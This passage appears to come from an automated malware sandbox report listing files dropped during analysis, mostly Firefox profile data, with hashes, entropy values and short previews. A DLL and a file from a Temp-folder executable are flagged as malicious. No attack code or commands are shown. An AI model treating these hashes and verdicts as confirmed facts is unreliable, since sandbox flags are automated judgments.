                                                                                                                                                                                                                                                                                                            File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.837595020998689
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                                                                                                                                                                                                                                            SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                                                                                                                                                                                                                                            SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                                                                                                                                                                                                                                            SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):1463
                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.574593760134356
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:9AB26458FA5ECE134CE4EFE3EA06EE6A
                                                                                                                                                                                                                                                                                                            SHA1:C919123D4A4A3123DED72B3445BF98FC96C20846
                                                                                                                                                                                                                                                                                                            SHA-256:F50CBF6C3B129B43895AB854F81C3B7137CD892BE34C84082115838461643523
                                                                                                                                                                                                                                                                                                            SHA-512:5749E9033654803A20F22E2F0C77BF5B816AD3AB7ACD081882AB861B496C615F99BF4135C500C52EE1A1D3500F1487282726AF839CBABFBE504EA3BA91A6352A
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"formautofill@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"pictureinpicture@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"screenshots@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"webcompat@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"default-theme@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"addons-search-detection@mozilla.com":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"google@search.mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"amazondotcom@search.mozilla.org":{"permissions":["internal:svgContex
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):1463
                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.574593760134356
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:9AB26458FA5ECE134CE4EFE3EA06EE6A
                                                                                                                                                                                                                                                                                                            SHA1:C919123D4A4A3123DED72B3445BF98FC96C20846
                                                                                                                                                                                                                                                                                                            SHA-256:F50CBF6C3B129B43895AB854F81C3B7137CD892BE34C84082115838461643523
                                                                                                                                                                                                                                                                                                            SHA-512:5749E9033654803A20F22E2F0C77BF5B816AD3AB7ACD081882AB861B496C615F99BF4135C500C52EE1A1D3500F1487282726AF839CBABFBE504EA3BA91A6352A
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"formautofill@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"pictureinpicture@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"screenshots@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"webcompat@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"default-theme@mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"addons-search-detection@mozilla.com":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"google@search.mozilla.org":{"permissions":["internal:svgContextPropertiesAllowed","internal:privateBrowsingAllowed"],"origins":[]},"amazondotcom@search.mozilla.org":{"permissions":["internal:svgContex
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):36830
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.185924656884556
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:5656BA69BD2966108A461AAE35F60226
                                                                                                                                                                                                                                                                                                            SHA1:9C2E5AE52D82CEA43C4A5FFF205A7700CF54D61C
                                                                                                                                                                                                                                                                                                            SHA-256:587596712960B26EAC18CB354CCD633FFDB218E374A9D59EFEA843914D7AB299
                                                                                                                                                                                                                                                                                                            SHA-512:38F715AD9156558B5D57CA2E75FB0FFE0C5C6728BD94484B8F15E090120DDD02DCE42DBC9CC7143AD6552460A5F3A40E577FAF1D76D5D40B25CDBE636F250054
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{60024e8e-cfd0-41e5-965d-7128c7dcf0e8}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):36830
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.185924656884556
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:5656BA69BD2966108A461AAE35F60226
                                                                                                                                                                                                                                                                                                            SHA1:9C2E5AE52D82CEA43C4A5FFF205A7700CF54D61C
                                                                                                                                                                                                                                                                                                            SHA-256:587596712960B26EAC18CB354CCD633FFDB218E374A9D59EFEA843914D7AB299
                                                                                                                                                                                                                                                                                                            SHA-512:38F715AD9156558B5D57CA2E75FB0FFE0C5C6728BD94484B8F15E090120DDD02DCE42DBC9CC7143AD6552460A5F3A40E577FAF1D76D5D40B25CDBE636F250054
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{60024e8e-cfd0-41e5-965d-7128c7dcf0e8}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):1021904
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.648417932394748
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:FE3355639648C417E8307C6D051E3E37
                                                                                                                                                                                                                                                                                                            SHA1:F54602D4B4778DA21BC97C7238FC66AA68C8EE34
                                                                                                                                                                                                                                                                                                            SHA-256:1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E
                                                                                                                                                                                                                                                                                                            SHA-512:8F4030BB2464B98ECCBEA6F06EB186D7216932702D94F6B84C56419E9CF65A18309711AB342D1513BF85AED402BC3535A70DB4395874828F0D35C278DD2EAC9C
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NH...)...)...)..eM...)..eM...)..eM..)..eM...)...)..i)..XA...)..XA..;)..XA...)...)..g)..cA...)..cA...)..Rich.)..........PE..d....z\.........." .....t................................................................`.........................................P...,...|...(............P...H...z.................T...........................0...................p............................text...$s.......t.................. ..`.rdata...~...........x..............@..@.data....3..........................@....pdata...H...P...J..................@..@.rodata..............^..............@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):1021904
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.648417932394748
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:FE3355639648C417E8307C6D051E3E37
                                                                                                                                                                                                                                                                                                            SHA1:F54602D4B4778DA21BC97C7238FC66AA68C8EE34
                                                                                                                                                                                                                                                                                                            SHA-256:1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E
                                                                                                                                                                                                                                                                                                            SHA-512:8F4030BB2464B98ECCBEA6F06EB186D7216932702D94F6B84C56419E9CF65A18309711AB342D1513BF85AED402BC3535A70DB4395874828F0D35C278DD2EAC9C
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NH...)...)...)..eM...)..eM...)..eM..)..eM...)...)..i)..XA...)..XA..;)..XA...)...)..g)..cA...)..cA...)..Rich.)..........PE..d....z\.........." .....t................................................................`.........................................P...,...|...(............P...H...z.................T...........................0...................p............................text...$s.......t.................. ..`.rdata...~...........x..............@..@.data....3..........................@....pdata...H...P...J..................@..@.rodata..............^..............@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.968220104601006
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:3D33CDC0B3D281E67DD52E14435DD04F
                                                                                                                                                                                                                                                                                                            SHA1:4DB88689282FD4F9E9E6AB95FCBB23DF6E6485DB
                                                                                                                                                                                                                                                                                                            SHA-256:F526E9F98841D987606EFEAFF7F3E017BA9FD516C4BE83890C7F9A093EA4C47B
                                                                                                                                                                                                                                                                                                            SHA-512:A4A96743332CC8EF0F86BC2E6122618BFC75ED46781DADBAC9E580CD73DF89E74738638A2CCCB4CAA4CBBF393D771D7F2C73F825737CDB247362450A0D4A4BC1
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 1.8.1.APIs: encode-video[h264], decode-video[h264].
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.968220104601006
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:3D33CDC0B3D281E67DD52E14435DD04F
                                                                                                                                                                                                                                                                                                            SHA1:4DB88689282FD4F9E9E6AB95FCBB23DF6E6485DB
                                                                                                                                                                                                                                                                                                            SHA-256:F526E9F98841D987606EFEAFF7F3E017BA9FD516C4BE83890C7F9A093EA4C47B
                                                                                                                                                                                                                                                                                                            SHA-512:A4A96743332CC8EF0F86BC2E6122618BFC75ED46781DADBAC9E580CD73DF89E74738638A2CCCB4CAA4CBBF393D771D7F2C73F825737CDB247362450A0D4A4BC1
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 1.8.1.APIs: encode-video[h264], decode-video[h264].
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.039751381258926154
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:8F7E058422CB02FC31D30D88A5FF397B
                                                                                                                                                                                                                                                                                                            SHA1:0F7F36366F5B71CBA59D5B6D221BC7D9FA248ABC
                                                                                                                                                                                                                                                                                                            SHA-256:D907332F2C2F6BABD84B105FD93D381D361B1D9FB315A435E03F4F7037FCBEF4
                                                                                                                                                                                                                                                                                                            SHA-512:8215A3E62CB1A76B7B33B5F939DF9F78C20418E16101A19693E5717ABAC147A172DD23FEB507A2F848EF6BC145FC627BE8ED3516E568BF3E9F99FD0F1EF4E85A
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:..-......................M.....J......e.YW$....-......................M.....J......e.YW$..........................................................'...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):13245
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.491839860935795
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:73058C7A21090DDBBDC6B38747ABE8C2
                                                                                                                                                                                                                                                                                                            SHA1:9399916A65DD9A6902F4A6DB06E562F64CBA80BB
                                                                                                                                                                                                                                                                                                            SHA-256:A0CB54F20C471E156B71FFB1C1306501DD623C5ECF669D7CF8CD62DE15AD9407
                                                                                                                                                                                                                                                                                                            SHA-512:2268C7F354837A2E5AB5D5435124F1D68F9343FAEDDCEC991F0055ED878005612D38A31620CA965FE48C1BCD6497B912122C9B7FCEC81134C6178767B95E8802
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1732191233);..user_pref("app.update.lastUpdateTime.background-update-timer", 1732191233);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1732191233);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 169633
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):13245
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.491839860935795
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:73058C7A21090DDBBDC6B38747ABE8C2
                                                                                                                                                                                                                                                                                                            SHA1:9399916A65DD9A6902F4A6DB06E562F64CBA80BB
                                                                                                                                                                                                                                                                                                            SHA-256:A0CB54F20C471E156B71FFB1C1306501DD623C5ECF669D7CF8CD62DE15AD9407
                                                                                                                                                                                                                                                                                                            SHA-512:2268C7F354837A2E5AB5D5435124F1D68F9343FAEDDCEC991F0055ED878005612D38A31620CA965FE48C1BCD6497B912122C9B7FCEC81134C6178767B95E8802
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1732191233);..user_pref("app.update.lastUpdateTime.background-update-timer", 1732191233);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1732191233);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 169633
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):90
                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                                                                                            SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                                                                                            SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                                                                                            SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):90
                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.194538242412464
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                                                                                                                                            SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                                                                                                                                            SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                                                                                                                                            SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:Mozilla lz4 compressed data, originally 6150 bytes
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):1722
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.417255732829388
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:90E066BD8C5194D6EB34EE1E27203A00
                                                                                                                                                                                                                                                                                                            SHA1:A196EE3BCDEA2C27C0200731307B5478AC88FDF3
                                                                                                                                                                                                                                                                                                            SHA-256:19787CC388C5CB551EBA4EBD83E54AA28D6C2B6D12C4A5E1663BFFC3345C7B6F
                                                                                                                                                                                                                                                                                                            SHA-512:434F31C0180EB213288CBAC4730E8CBD9F8ABC805DF2C1CAFEDD27969D67685E3DE4A6974A55F2FEA0DE3A0448955906E7C1308035DDB319BBF22F77F5EBD41A
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:mozLz40.......{"version":["ses....restore",1],"windows":[{"tab..bentrie...url":"about:A..."triggeringPrincipal_base64":"eyIzIjp7fX0="}],"lastAccessed":1732191208960,"hidden":false,"searchMode":null,"userContextId":0,"attributes":{},"index":1,"formdata":{"id":{...D.....91hom....itle":"New Tab","cacheKey....ID":4,"docshellUU...!"{4928f5ff-b473-439a-b63d-349ac3523a33}","resultf.4URI...pz..ToInherit..s{\"0\":...\"moz-null4...:{c0c3c76c-3c3b-44b0-9d2c-f5a4aaf1d46e}\"}....hasUserInteractW........@{\"3...E...docIdentifier":5,"persist":true)...696333857659).30mag....chrome://branding/ca..nt/icon32.png"X..requestedIk..0..aselect...,"_closedTK.@],"_...C....GroupCount":-1,....Flags":2167541758....dth":1164,"height":891,"screenXN.....Y..Aizem0.."maximized"...BeforeMin...&..workspace....85d88aad-e69b-4cbc-bd94-0aee6b4b5d51...._shouldRb....","..)At...6.........I..W...6..O........p....1":{R.hUpdate\..784,"startTim..1595...centCrash...0},"globalF.Dcook.. ho...."addons.mozilla.or..@valuE..A8bad2467092e
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:Mozilla lz4 compressed data, originally 6150 bytes
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):1722
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.417255732829388
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:90E066BD8C5194D6EB34EE1E27203A00
                                                                                                                                                                                                                                                                                                            SHA1:A196EE3BCDEA2C27C0200731307B5478AC88FDF3
                                                                                                                                                                                                                                                                                                            SHA-256:19787CC388C5CB551EBA4EBD83E54AA28D6C2B6D12C4A5E1663BFFC3345C7B6F
                                                                                                                                                                                                                                                                                                            SHA-512:434F31C0180EB213288CBAC4730E8CBD9F8ABC805DF2C1CAFEDD27969D67685E3DE4A6974A55F2FEA0DE3A0448955906E7C1308035DDB319BBF22F77F5EBD41A
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:mozLz40.......{"version":["ses....restore",1],"windows":[{"tab..bentrie...url":"about:A..."triggeringPrincipal_base64":"eyIzIjp7fX0="}],"lastAccessed":1732191208960,"hidden":false,"searchMode":null,"userContextId":0,"attributes":{},"index":1,"formdata":{"id":{...D.....91hom....itle":"New Tab","cacheKey....ID":4,"docshellUU...!"{4928f5ff-b473-439a-b63d-349ac3523a33}","resultf.4URI...pz..ToInherit..s{\"0\":...\"moz-null4...:{c0c3c76c-3c3b-44b0-9d2c-f5a4aaf1d46e}\"}....hasUserInteractW........@{\"3...E...docIdentifier":5,"persist":true)...696333857659).30mag....chrome://branding/ca..nt/icon32.png"X..requestedIk..0..aselect...,"_closedTK.@],"_...C....GroupCount":-1,....Flags":2167541758....dth":1164,"height":891,"screenXN.....Y..Aizem0.."maximized"...BeforeMin...&..workspace....85d88aad-e69b-4cbc-bd94-0aee6b4b5d51...._shouldRb....","..)At...6.........I..W...6..O........p....1":{R.hUpdate\..784,"startTim..1595...centCrash...0},"globalF.Dcook.. ho...."addons.mozilla.or..@valuE..A8bad2467092e
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:Mozilla lz4 compressed data, originally 6150 bytes
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):1722
                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.417255732829388
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:90E066BD8C5194D6EB34EE1E27203A00
                                                                                                                                                                                                                                                                                                            SHA1:A196EE3BCDEA2C27C0200731307B5478AC88FDF3
                                                                                                                                                                                                                                                                                                            SHA-256:19787CC388C5CB551EBA4EBD83E54AA28D6C2B6D12C4A5E1663BFFC3345C7B6F
                                                                                                                                                                                                                                                                                                            SHA-512:434F31C0180EB213288CBAC4730E8CBD9F8ABC805DF2C1CAFEDD27969D67685E3DE4A6974A55F2FEA0DE3A0448955906E7C1308035DDB319BBF22F77F5EBD41A
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
